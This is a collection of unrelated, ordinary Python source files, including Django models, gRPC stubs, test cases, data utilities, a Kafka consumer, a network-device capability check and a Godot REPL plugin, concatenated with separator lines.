@commands("about")
def normal_about(bot, trigger):
bot.say("Soy Vortexz V-XeniBot, un bot desarrollado por Xenial, Reeditado por Freuddy.")
|
from django.urls import path
from .views import home, blog, post, search
app_name = "blog"
urlpatterns = [
path("", home, name="home"),
path("blog/", blog, name="blog"),
path("post/<int:id>/", post, name="post"),
path("search/", search, name="search")
]
|
pge_events = [
'2017-06-16',
'2017-06-19',
'2017-06-20',
'2017-06-22',
'2017-06-23',
'2017-07-07',
'2017-07-27',
'2017-07-31',
'2017-08-01',
'2017-08-02',
'2017-08-28',
'2017-08-29',
'2017-08-31',
'2017-09-01',
'2017-09-02',
'2017-06-19',
'2017-06-20',
'2017-07-06',
'2017-07-07',
'2017-07-27',
'2017-07-31',
'2017-08-01',
'2017-08-28',
'2017-08-29',
'2017-08-31',
'2017-09-05',
'2017-09-12',
'2018-06-12',
'2018-06-13',
'2018-07-10',
'2018-07-16',
'2018-07-17',
'2018-07-19',
'2018-07-24',
'2018-07-25',
'2018-07-27'] |
"""This module is responsible for conversion of the videos to frame by frame format."""
import logging
from pathlib import Path
from typing import Any, Dict, List, Union
import imageio
import numpy as np
import pandas as pd
import tqdm
# This hotfix is added since imageio checks compability by file extension name instead of probing.
from imageio.plugins.ffmpeg import FfmpegFormat
from wai_data_tools import io
FfmpegFormat.can_read = lambda x, y: True
def get_video_reader(video_filepath: Path) -> Any:
"""Get a imageio reader object for the provided video file. Assumes ffmpeg encoding.
Args:
video_filepath: Path to ffmpeg compatible video file
Returns:
reader object for parsing video
"""
return imageio.get_reader(video_filepath, "FFMPEG")
def calculate_frames_in_timespan(t_start: np.ndarray, t_end: np.ndarray, fps: float) -> np.ndarray:
"""Calculate the frames in the given timespan. Will include one more frame at each end if possible.
Args:
t_start: start of time interval
t_end: end of time interval
fps: frames per second
Returns:
array with frame indices
"""
logger = logging.getLogger(__name__)
logger.debug("Calculating start and end frame.")
t_frame = 1 / fps
frame_start = t_start / t_frame
if frame_start % 1 > 0:
logger.debug("Remainder when calculating the index for start frame is not zero. Performing floor operation.")
frame_start = np.floor(frame_start)
frame_end = t_end / t_frame
if frame_end % 1 > 0:
logger.debug("Remainder when calculating the index for end frame is not zero. Performing ceiling operation.")
frame_end = np.ceil(frame_end)
logger.debug("Frames with label start at frame %s and ends at %s", frame_start, frame_end)
return np.arange(frame_start, frame_end)
def read_frames_in_video(
video_reader: Any, frames_with_target: np.ndarray, sampling_frequency: int = 1
) -> Dict[int, Dict[str, Union[np.ndarray, bool]]]:
"""Read the frames in a video by iterating a video reader object.
Args:
video_reader: imageio reader for the video to filter.
frames_with_target: array with frame indices for frames that
should be marked as containing a target class.
sampling_frequency: How often in video to read frame in video,
i.e. sampling frequency of 2 is every second frame and
sampling frequency 4 is every fourth frame. Default is 1.
Returns:
a dict of dicts where the key in root dict is the frame index
and values is dicts with frame information. Each frame
information dict follows schema: {"image": numpy array for frame
image,
"contains_target": boolean if label is present in image}
"""
logger = logging.getLogger(__name__)
logger.debug("Filtering frames in video to label and non label frames")
frames_dict = {}
for frame_ind, frame_img in enumerate(video_reader):
if frame_ind % sampling_frequency != 0:
continue
contains_label = frame_ind in frames_with_target
frame_information_dict = {"image": frame_img, "contains_target": contains_label}
frames_dict[frame_ind] = frame_information_dict
return frames_dict
def split_video_file_to_frame_files(
video_filepath: Path,
video_row: pd.Series,
label_config: Dict[str, Union[int, bool, str]],
) -> Dict[int, Dict[str, Union[np.ndarray, bool]]]:
"""Split a video file into separate frames in the form of .jpeg files.
Args:
video_filepath: Path to .mjpg video file
video_row: Series with video information
label_config: Label configuration
Returns:
Dictionary where key is frame index and value is dict with frame array and target flag.
"""
logger = logging.getLogger(__name__)
is_target = label_config["is_target"]
sampling_frequency = label_config["sampling_frequency"]
logger.debug("Splitting video file to frame files...")
reader = get_video_reader(video_filepath=video_filepath)
meta = reader.get_meta_data()
if is_target:
target_frames = calculate_frames_in_timespan(
t_start=video_row["start"],
t_end=video_row["end"],
fps=meta["fps"],
)
else:
target_frames = []
frames_dict = read_frames_in_video(
video_reader=reader,
frames_with_target=target_frames,
sampling_frequency=sampling_frequency,
)
return frames_dict
def split_video_files_to_frame_files(
src_video_dir: Path,
dst_frame_dir: Path,
video_dataframe: pd.DataFrame,
label_config: Dict[str, Union[int, bool, str]],
) -> pd.DataFrame:
"""Splits video files in source directory, calculates frame information and stores result in destination directory.
Args:
src_video_dir: Path to directory where video files is stored
dst_frame_dir: Path to directory to store new data
video_dataframe: Dataframe with video information
label_config: Label configuration
Returns:
Dataframe with frame information
"""
logger = logging.getLogger(__name__)
logger.info("Reading and formatting excel dataframe")
label_name = label_config["name"]
logger.info("Filtering dataframe based on label %s", label_name)
label_dataframe = video_dataframe[video_dataframe["label"] == label_name]
frame_rows = []
for _, video_row in tqdm.tqdm(list(label_dataframe.iterrows())):
video_filename = video_row["filename"]
folder = video_row["folder"]
video_filepath = src_video_dir / folder / video_filename
try:
frames_dict = split_video_file_to_frame_files(
video_filepath=video_filepath,
video_row=video_row,
label_config=label_config,
)
except FileNotFoundError:
logger.debug("Could not find file: %s", video_filepath.name)
continue
frame_rows.extend(create_frame_information_rows(video_row=video_row, frames_dict=frames_dict))
io.save_frames(video_name=video_filepath.stem, dst_root_dir=dst_frame_dir, frames_dict=frames_dict)
label_frame_df = pd.DataFrame(data=frame_rows)
return label_frame_df
def create_frame_information_rows(
video_row: pd.Series, frames_dict: Dict[int, Dict[str, Union[bool, np.ndarray]]]
) -> List[pd.Series]:
"""Creates frame information rows from video row.
Args:
video_row: Series with video information
frames_dict: Dictionary with frame information
Returns:
List with rows describing frame information
"""
frame_rows = []
for frame_ind, frame_dict in frames_dict.items():
new_row = video_row.copy()
new_row["frame_ind"] = frame_ind
new_row["target"] = video_row["label"] if frame_dict["contains_target"] else "background"
new_row["video_name"] = new_row["filename"].replace(".mjpg", "")
new_row["file_name"] = f"{new_row['video_name']}___{new_row['frame_ind']}.jpeg"
new_row = new_row[["video_name", "frame_ind", "file_name", "target", "label"]]
frame_rows.append(new_row)
return frame_rows
|
# Copyright 2021 Katteli Inc.
# TestFlows.com Open-Source Software Testing Framework (http://testflows.com)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from testflows._core.testtype import TestType
def transform():
"""Transform msg to test name.
"""
msg = None
while True:
line = None
if msg is not None:
if getattr(TestType, msg["test_type"]) >= TestType.Test:
line = f"{msg['test_name']}\n"
msg = yield line
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from google.ads.google_ads.v6.proto.resources import account_budget_proposal_pb2 as google_dot_ads_dot_googleads_dot_v6_dot_resources_dot_account__budget__proposal__pb2
from google.ads.google_ads.v6.proto.services import account_budget_proposal_service_pb2 as google_dot_ads_dot_googleads_dot_v6_dot_services_dot_account__budget__proposal__service__pb2
class AccountBudgetProposalServiceStub(object):
"""Proto file describing the AccountBudgetProposal service.
A service for managing account-level budgets via proposals.
A proposal is a request to create a new budget or make changes to an
existing one.
Reads for account-level budgets managed by these proposals will be
supported in a future version. Until then, please use the
BudgetOrderService from the AdWords API. Learn more at
https://developers.google.com/adwords/api/docs/guides/budget-order
Mutates:
The CREATE operation creates a new proposal.
UPDATE operations aren't supported.
The REMOVE operation cancels a pending proposal.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetAccountBudgetProposal = channel.unary_unary(
'/google.ads.googleads.v6.services.AccountBudgetProposalService/GetAccountBudgetProposal',
request_serializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_account__budget__proposal__service__pb2.GetAccountBudgetProposalRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads_dot_v6_dot_resources_dot_account__budget__proposal__pb2.AccountBudgetProposal.FromString,
)
self.MutateAccountBudgetProposal = channel.unary_unary(
'/google.ads.googleads.v6.services.AccountBudgetProposalService/MutateAccountBudgetProposal',
request_serializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_account__budget__proposal__service__pb2.MutateAccountBudgetProposalRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_account__budget__proposal__service__pb2.MutateAccountBudgetProposalResponse.FromString,
)
class AccountBudgetProposalServiceServicer(object):
"""Proto file describing the AccountBudgetProposal service.
A service for managing account-level budgets via proposals.
A proposal is a request to create a new budget or make changes to an
existing one.
Reads for account-level budgets managed by these proposals will be
supported in a future version. Until then, please use the
BudgetOrderService from the AdWords API. Learn more at
https://developers.google.com/adwords/api/docs/guides/budget-order
Mutates:
The CREATE operation creates a new proposal.
UPDATE operations aren't supported.
The REMOVE operation cancels a pending proposal.
"""
def GetAccountBudgetProposal(self, request, context):
"""Returns an account-level budget proposal in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MutateAccountBudgetProposal(self, request, context):
"""Creates, updates, or removes account budget proposals. Operation statuses
are returned.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_AccountBudgetProposalServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetAccountBudgetProposal': grpc.unary_unary_rpc_method_handler(
servicer.GetAccountBudgetProposal,
request_deserializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_account__budget__proposal__service__pb2.GetAccountBudgetProposalRequest.FromString,
response_serializer=google_dot_ads_dot_googleads_dot_v6_dot_resources_dot_account__budget__proposal__pb2.AccountBudgetProposal.SerializeToString,
),
'MutateAccountBudgetProposal': grpc.unary_unary_rpc_method_handler(
servicer.MutateAccountBudgetProposal,
request_deserializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_account__budget__proposal__service__pb2.MutateAccountBudgetProposalRequest.FromString,
response_serializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_account__budget__proposal__service__pb2.MutateAccountBudgetProposalResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v6.services.AccountBudgetProposalService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class AccountBudgetProposalService(object):
"""Proto file describing the AccountBudgetProposal service.
A service for managing account-level budgets via proposals.
A proposal is a request to create a new budget or make changes to an
existing one.
Reads for account-level budgets managed by these proposals will be
supported in a future version. Until then, please use the
BudgetOrderService from the AdWords API. Learn more at
https://developers.google.com/adwords/api/docs/guides/budget-order
Mutates:
The CREATE operation creates a new proposal.
UPDATE operations aren't supported.
The REMOVE operation cancels a pending proposal.
"""
@staticmethod
def GetAccountBudgetProposal(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/google.ads.googleads.v6.services.AccountBudgetProposalService/GetAccountBudgetProposal',
google_dot_ads_dot_googleads_dot_v6_dot_services_dot_account__budget__proposal__service__pb2.GetAccountBudgetProposalRequest.SerializeToString,
google_dot_ads_dot_googleads_dot_v6_dot_resources_dot_account__budget__proposal__pb2.AccountBudgetProposal.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def MutateAccountBudgetProposal(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/google.ads.googleads.v6.services.AccountBudgetProposalService/MutateAccountBudgetProposal',
google_dot_ads_dot_googleads_dot_v6_dot_services_dot_account__budget__proposal__service__pb2.MutateAccountBudgetProposalRequest.SerializeToString,
google_dot_ads_dot_googleads_dot_v6_dot_services_dot_account__budget__proposal__service__pb2.MutateAccountBudgetProposalResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
|
from tornado.test.httpclient_test import HTTPClientCommonTestCase
try:
import pycurl
except ImportError:
pycurl = None
if pycurl is not None:
from tornado.curl_httpclient import CurlAsyncHTTPClient
class CurlHTTPClientCommonTestCase(HTTPClientCommonTestCase):
def get_http_client(self):
return CurlAsyncHTTPClient(io_loop=self.io_loop)
# Remove the base class from our namespace so the unittest module doesn't
# try to run it again.
del HTTPClientCommonTestCase
if pycurl is None:
del CurlHTTPClientCommonTestCase
|
import contextlib
import os
from fontTools import ttLib
from google.apputils import app
from util import google_fonts as fonts
def _LoadGlyf(font, char, name, problems):
"""Loads a glyf and expands (populates fields) it.
Args:
font: A TTFont.
char: int id of char, e.g. ord('C').
name: name to use in problems string describing char. e.g. SPACE.
problems: set to add problems to.
Returns:
2-tuple of (cmap_key, glyph). (None, None) if a problem occurred. Adds
to problems if a problem occurred.
"""
if 'glyf' not in font:
problems.add('NO_GLYF_TABLE')
return (None, None)
cmap = fonts.UnicodeCmapTables(font).next().cmap
if char not in cmap:
problems.add('NO_%s' % name)
return (None, None)
key = cmap[char]
glyph = font['glyf'].glyphs[key]
glyph.expand(font['glyf'])
return (key, glyph)
def _HasInk(font, glyph_name):
"""Checks if specified glyph has any ink.
That is, that it has at least one defined contour associated. Composites are
considered to have ink if any of their components have ink.
Args:
font: A TTFont that has a 'glyf' table.
glyph_name: The name of the glyph to check for ink.
Returns:
True if the font has at least one contour associated with it.
"""
glyph = font['glyf'].glyphs[glyph_name]
glyph.expand(font['glyf'])
if not glyph.isComposite():
if glyph.numberOfContours == 0:
return False
(coords, _, _) = glyph.getCoordinates(font['glyf'])
# you need at least 3 points to draw
return len(coords) > 2
# composite is blank if composed of blanks
# if you setup a font with cycles you are just a bad person
for glyph_name in glyph.getComponentNames(glyph.components):
if _HasInk(font, glyph_name):
return True
return False
def _CheckFont(font):
"""Inspects a font for space/nbsp issues.
Args:
font: A TTFont.
Returns:
A set of strings describing problems found in the font. Empty set if none.
"""
problems = set()
(space_cmap, _) = _LoadGlyf(font, 0x0020, 'SPACE', problems)
(nbsp_cmap, _) = _LoadGlyf(font, 0x00A0, 'NBSP', problems)
if nbsp_cmap and _HasInk(font, nbsp_cmap):
problems.add('NBSP_HAS_INK')
if space_cmap and _HasInk(font, space_cmap):
problems.add('SPACE_HAS_INK')
if nbsp_cmap and space_cmap:
if font['hmtx'][nbsp_cmap][0] != font['hmtx'][space_cmap][0]:
problems.add('SPACE_NBSP_WIDTH_MISMATCH')
return set(problems)
def main(argv):
for filename in argv[1:]:
with contextlib.closing(ttLib.TTFont(filename)) as font:
problems = _CheckFont(font)
if not problems:
problems.add('OK')
print '{:48} {}'.format(os.path.basename(filename),
','.join(sorted(problems)))
if __name__ == '__main__':
app.run()
|
import json
from unittest.mock import patch
import pytest
import tornado
from jupyterlab_git.handlers import NAMESPACE
from .testutils import assert_http_error, maybe_future
@patch("jupyterlab_git.git.execute")
async def test_git_add_remote_success_no_name(mock_execute, jp_fetch, jp_root_dir):
# Given
local_path = jp_root_dir / "test_path"
url = "http://github.com/myid/myrepository.git"
mock_execute.return_value = maybe_future((0, "", ""))
# When
body = {
"url": url,
}
response = await jp_fetch(
NAMESPACE,
local_path.name,
"remote",
"add",
body=json.dumps(body),
method="POST",
)
# Then
command = ["git", "remote", "add", "origin", url]
mock_execute.assert_called_once_with(command, cwd=str(local_path))
assert response.code == 201
payload = json.loads(response.body)
assert payload == {
"code": 0,
"command": " ".join(command),
}
@patch("jupyterlab_git.git.execute")
async def test_git_add_remote_success(mock_execute, jp_fetch, jp_root_dir):
# Given
local_path = jp_root_dir / "test_path"
url = "http://github.com/myid/myrepository.git"
name = "distant"
mock_execute.return_value = maybe_future((0, "", ""))
# When
body = {"url": url, "name": name}
response = await jp_fetch(
NAMESPACE,
local_path.name,
"remote",
"add",
body=json.dumps(body),
method="POST",
)
# Then
command = ["git", "remote", "add", name, url]
mock_execute.assert_called_once_with(command, cwd=str(local_path))
assert response.code == 201
payload = json.loads(response.body)
assert payload == {
"code": 0,
"command": " ".join(command),
}
@patch("jupyterlab_git.git.execute")
async def test_git_add_remote_failure(mock_execute, jp_fetch, jp_root_dir):
# Given
local_path = jp_root_dir / "test_path"
url = "http://github.com/myid/myrepository.git"
error_msg = "Fake failure"
error_code = 128
mock_execute.return_value = maybe_future((error_code, "", error_msg))
# When
body = {
"url": url,
}
with pytest.raises(tornado.httpclient.HTTPClientError) as e:
await jp_fetch(
NAMESPACE,
local_path.name,
"remote",
"add",
body=json.dumps(body),
method="POST",
)
assert_http_error(e, 500)
# Then
mock_execute.assert_called_once_with(
["git", "remote", "add", "origin", url], cwd=str(local_path)
)
|
"""empty message
Revision ID: 9aab99cbf5c8
Revises: 97be1663d11c
Create Date: 2020-10-07 23:59:37.393430
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = "9aab99cbf5c8"
down_revision = "97be1663d11c"
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_constraint("users_first_name_key", "users", type_="unique")
op.drop_constraint("users_last_name_key", "users", type_="unique")
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_unique_constraint("users_last_name_key", "users", ["last_name"])
op.create_unique_constraint("users_first_name_key", "users", ["first_name"])
# ### end Alembic commands ###
|
import boto3
import os
import json
def get_key_from_ddb(key):
ddb = boto3.client('dynamodb')
response = ddb.get_item(
TableName = 'alert-log',
Key = {
'message-id': {
'S': key
}
}
)
return response
def put_item_on_ddb(key, item):
ddb = boto3.client('dynamodb')
response = ddb.put_item(
TableName = 'alert-log',
Item = {
'message-id': {
'S': key
},
'message': {
'S': item
},
'active': {
'BOOL': True
}
}
)
return response
def lambda_handler(event, context):
sns_msg = json.loads(event['Records'][0]['Sns']['Message'])
print(sns_msg)
message = sns_msg['message']
destination_phone_number = sns_msg['destination_phone_number']
print(message)
print(destination_phone_number)
counter = get_key_from_ddb('counter')
current_key = int(counter['Item']['message']['S'])
next_key = current_key + 1
print(str(next_key))
print(put_item_on_ddb(str(next_key), message))
print(put_item_on_ddb('counter', str(next_key)))
connect = boto3.client('connect')
response = connect.start_outbound_voice_contact(
#Attributes={
# 'message': message
#},
ContactFlowId='xxxxx-xxx-xxx-xxxx-xxxxx',
DestinationPhoneNumber=destination_phone_number,
InstanceId='xxxxx-xxx-xxx-xxxx-xxxxx',
SourcePhoneNumber='+1510xxxx'
)
print('[info] Phone with number: ' + destination_phone_number + ' has been called with message: "' + message + ' "') |
from datetime import datetime
from typing import Any, Callable, Dict, List, Optional
import numpy as np
import pandas as pd
import pyarrow as pa
from pandas.api.types import is_object_dtype
from slide.exceptions import SlideInvalidOperation
from slide.utils import SlideUtils
from triad.utils.assertion import assert_or_throw
from triad.utils.pyarrow import TRIAD_DEFAULT_TIMESTAMP
_KEY_COL_NAME = "__safe_groupby_key__"
_DEFAULT_DATETIME = datetime(2000, 1, 1)
class PandasUtils(SlideUtils[pd.DataFrame, pd.Series]):
"""A collection of pandas utils"""
def is_series(self, obj: Any) -> bool:
return isinstance(obj, pd.Series)
def to_series(self, obj: Any, name: Optional[str] = None) -> pd.Series:
if self.is_series(obj):
if name is not None and obj.name != name:
return obj.rename(name)
return obj
if isinstance(obj, (np.ndarray, list)):
return pd.Series(obj, name=name)
raise NotImplementedError # pragma: no cover
def series_to_array(self, col: pd.Series) -> List[Any]:
return col.tolist()
def to_constant_series(
self,
constant: Any,
from_series: pd.Series,
dtype: Any = None,
name: Optional[str] = None,
) -> pd.Series:
return pd.Series(constant, index=from_series.index, dtype=dtype, name=name)
def cols_to_df(
self, cols: List[pd.Series], names: Optional[List[str]] = None
) -> pd.DataFrame:
assert_or_throw(
any(self.is_series(s) for s in cols),
SlideInvalidOperation("at least one value in cols should be series"),
)
if names is None:
return pd.DataFrame({c.name: c for c in cols})
return pd.DataFrame(dict(zip(names, cols)))
def as_pandas(self, df: pd.DataFrame) -> pd.DataFrame:
return df
def to_schema(self, df: pd.DataFrame) -> pa.Schema:
if len(df.index) == 0:
return super().to_schema(df)
self.ensure_compatible(df)
assert_or_throw(
df.columns.dtype == "object",
ValueError("Pandas dataframe must have named schema"),
)
fields: List[pa.Field] = []
for field in pa.Schema.from_pandas(df, preserve_index=False):
if pa.types.is_timestamp(field.type):
fields.append(pa.field(field.name, TRIAD_DEFAULT_TIMESTAMP))
else:
fields.append(field)
return pa.schema(fields)
def sql_groupby_apply(
self,
df: pd.DataFrame,
cols: List[str],
func: Callable[[pd.DataFrame], pd.DataFrame],
output_schema: Optional[pa.Schema] = None,
**kwargs: Any,
) -> pd.DataFrame:
if pd.__version__ < "1.2": # pragma: no cover
# https://github.com/pandas-dev/pandas/issues/35889
return self._sql_groupby_apply_older_version(df, cols, func, **kwargs)
self.ensure_compatible(df)
if len(cols) == 0:
return func(df)
return (
df.groupby(cols, dropna=False)
.apply(lambda tdf: func(tdf.reset_index(drop=True)), **kwargs)
.reset_index(drop=True)
)
def _sql_groupby_apply_older_version(
self,
df: pd.DataFrame,
cols: List[str],
func: Callable[[pd.DataFrame], pd.DataFrame],
**kwargs: Any,
) -> pd.DataFrame: # pragma: no cover
def _wrapper(keys: List[str], df: pd.DataFrame) -> pd.DataFrame:
return func(df.drop(keys, axis=1).reset_index(drop=True))
def _fillna_default(col: Any) -> Any:
if is_object_dtype(col.dtype):
return col.fillna(0)
ptype = self.to_safe_pa_type(col.dtype)
if pa.types.is_timestamp(ptype) or pa.types.is_date(ptype):
return col.fillna(_DEFAULT_DATETIME)
if pa.types.is_string(ptype): # pragma: no cover
return col.fillna("")
if pa.types.is_boolean(ptype):
return col.fillna(False)
return col.fillna(0)
self.ensure_compatible(df)
if len(cols) == 0:
return func(df)
params: Dict[str, Any] = {}
for c in cols:
params[_KEY_COL_NAME + "null_" + c] = df[c].isnull()
params[_KEY_COL_NAME + "fill_" + c] = _fillna_default(df[c])
keys = list(params.keys())
gdf = df.assign(**params)
return (
gdf.groupby(keys)
.apply(lambda df: _wrapper(keys, df), **kwargs)
.reset_index(drop=True)
)
|
# -*- coding:utf-8 -*-
# author๏ผAnson
# @Time : 2020/9/21 14:40
# @File : settings.py
from __future__ import unicode_literals
from kafka import KafkaConsumer
from conf.settings import SERVER_IP, TOPIC, AUTO_OFFSET_RESET, CONSUMER_GROUP, API_VERSION
class KafkaConsumerModule(object):
def __init__(self, bootstrap_servers, auto_offset_reset, topic, group_id, api_version):
self.bootstrap_servers = bootstrap_servers
self.auto_offset_reset = auto_offset_reset
self.topic = topic
self.group_id = group_id
self.api_version = api_version
self.consumer = KafkaConsumer(
self.topic,
bootstrap_servers=self.bootstrap_servers,
auto_offset_reset=self.auto_offset_reset,
group_id=self.group_id,
session_timeout_ms=6000,
heartbeat_interval_ms=2000,
api_version=self.api_version,
enable_auto_commit=False
)
def print_message(self):
messages = self.consumer
count = 0
for message in messages:
print('ๆถ่ดนๆฐๆฎ็ฌฌ{0}ๆก'.format(count))
print(message.value)
count += 1
def main():
print('-' * 20)
print('ๆถ่ดน่
')
print('-' * 20)
consumer = KafkaConsumerModule(SERVER_IP, AUTO_OFFSET_RESET, TOPIC, CONSUMER_GROUP, API_VERSION)
consumer.print_message()
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making ่้ฒธๆบไบPaaSๅนณๅฐ็คพๅบ็ (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2019 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
import importlib
import logging
import traceback
from pipeline.contrib.external_plugins.models import source_cls_factory
from pipeline.contrib.external_plugins.utils.importer import importer_context
logger = logging.getLogger("root")
def load_external_modules():
for source_type, source_model_cls in list(source_cls_factory.items()):
# get all external source
sources = source_model_cls.objects.all()
# get importer for source
for source in sources:
_import_modules_in_source(source)
def _import_modules_in_source(source):
try:
importer = source.importer()
with importer_context(importer):
for mod in source.modules:
importlib.import_module(mod)
except Exception:
logger.error("An error occurred when loading {{{}}}: {}".format(source.name, traceback.format_exc()))
|
# ---------------------------------------------------------------------
# Linux.Debian.get_capabilities
# ---------------------------------------------------------------------
# Copyright (C) 2007-2018 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# NOC modules
from noc.sa.profiles.Generic.get_capabilities import Script as BaseScript
from noc.sa.profiles.Generic.get_capabilities import false_on_cli_error
class Script(BaseScript):
name = "Linux.Debian.get_capabilities"
@false_on_cli_error
def has_lldp_cli(self):
"""
Check box has lldp/ladvd daemon enabled
"""
r1 = self.cli("/bin/ps aux | grep [l]advd")
r2 = self.cli("/bin/ps aux | grep [l]ldpd")
if r1 or r2:
return True
else:
return False
@false_on_cli_error
def has_cdp_cli(self):
"""
Check box has cdp enabled
"""
# Ladvd daemon always listen CDP
r1 = self.cli("/bin/ps aux | grep [l]advd")
# for lldpd daemon need check CDP enable in config. LLDPD_OPTIONS="-c"
# in /etc/sysconfig/lldpd
r2 = self.cli('/bin/ps aux | grep "[/]usr/sbin/lldpd -c"')
if r1 or r2:
return True
else:
return False
|
import sys
import code
from godot import exposed, export
from godot import *
from .plugin import BASE_RES
FONT = ResourceLoader.load(f"{BASE_RES}/hack_regular.tres")
@exposed(tool=True)
class PythonREPL(VBoxContainer):
def _enter_tree(self):
self.history = []
self.selected_history = 0
self.output_box = self.get_node("OutputBox")
self.output_box.add_font_override("normal_font", FONT)
self.output_box.add_font_override("mono_font", FONT)
self.run_button = self.get_node("FooterContainer/RunButton")
self.copy_button = self.get_node("HeaderContainer/CopyButton")
self.copy_button.connect("pressed", self, "copy")
self.clear_button = self.get_node("HeaderContainer/ClearButton")
self.clear_button.connect("pressed", self, "clear")
self.input_box = self.get_node("FooterContainer/InputBox")
self.input_box.connect("text_entered", self, "execute")
self.run_button.connect("pressed", self, "execute")
self.interpreter_context = {"__name__": "__console__", "__doc__": None}
self.interpreter = code.InteractiveConsole(self.interpreter_context)
self.more = False
if getattr(sys.stdout, "add_callback", None) is not None:
sys.stdout.add_callback(self.output_line)
# sys.stderr.add_callback(self.output_line)
else:
self.output_line("It seems IO Streams Capture is disabled.")
self.output_line("In order to see the output of commands, go to:")
self.output_line("Project > Project Settings > Python Script > Io Streams Capture")
self.output_line("and enable Io Streams Capture.")
def _exit_tree(self):
if getattr(sys.stdout, "remove_callback", None) is not None:
sys.stdout.remove_callback(self.output_line)
# sys.stderr.remove_callback(self.output_line)
def _ready(self):
pass
def output_line(self, line):
self.output_box.push_mono()
self.output_box.add_text(line)
self.output_box.newline()
self.output_box.pop()
def remove_last_line(self):
self.output_box.remove_line(self.output_box.get_line_count() - 2)
self.output_box.scroll_to_line(self.output_box.get_line_count() - 1)
def execute(self, *args, **kwargs):
string = self.input_box.get_text()
# avoid adding multiple repeated entries to the command history
if not (len(self.history) > 0 and self.history[-1] == string):
self.history.append(string)
self.selected_history = 0
self.input_box.clear()
linestart = "... " if self.more else ">>> "
self.output_line(linestart + str(string))
self.more = self.interpreter.push(str(string))
def up_pressed(self):
if len(self.history) >= abs(self.selected_history - 1):
self.selected_history -= 1
self.input_box.clear()
self.input_box.set_text(self.history[self.selected_history])
self.input_box.grab_focus()
def down_pressed(self):
if self.selected_history + 1 == 0:
self.selected_history += 1
self.input_box.clear()
elif self.selected_history + 1 < 0:
self.selected_history += 1
self.input_box.clear()
self.input_box.set_text(self.history[self.selected_history])
self.input_box.grab_focus()
def copy(self):
pass
def clear(self):
self.output_box.clear()
|
from django.db import models
from django.contrib.auth.models import AbstractBaseUser, BaseUserManager, PermissionsMixin
# User Manager
class UserManager(BaseUserManager):
def create_user(self, username, email, password=None, **kwargs):
"""Create and return a `User` with an email, phone number, username and password."""
if username is None:
raise TypeError('Users must have a username.')
if email is None:
raise TypeError('Users must have an email.')
user = self.model(username=username, email=self.normalize_email(email))
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, username, email, password):
"""
Create and return a `User` with superuser (admin) permissions.
"""
if password is None:
raise TypeError('Superusers must have a password.')
if email is None:
raise TypeError('Superusers must have an email.')
if username is None:
raise TypeError('Superusers must have an username.')
user = self.create_user(username, email, password)
user.is_superuser = True
user.is_staff = True
user.save(using=self._db)
return user
# Repository Django model
class Repository(models.Model):
title = models.CharField("Title", max_length=50)
about = models.CharField("About", max_length=300)
stars = models.IntegerField()
watching = models.IntegerField()
forks = models.IntegerField()
# User Django model
class User(AbstractBaseUser):
username = models.CharField(db_index=True, max_length=255, unique=True, default=False)
name = models.CharField("First and Last name", max_length=255)
email = models.EmailField(db_index=True, unique=True, null=True, blank=True)
phone = models.CharField(max_length=20)
repositories = models.ManyToManyField(Repository)
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['username']
is_active = models.BooleanField(default=True)
is_staff = models.BooleanField(default=False)
objects = UserManager()
def __str__(self):
return f"{self.username}"
|
from corehq.apps.groups.models import Group
from corehq.apps.reports.daterange import get_simple_dateranges
from dimagi.ext.couchdbkit import *
from dimagi.utils.decorators.memoized import memoized
DAILY = "daily"
WEEKLY = "weekly"
MONTHLY = "monthly"
DEFAULT_HOUR = 8
DEFAULT_WEEK_DAY = 1
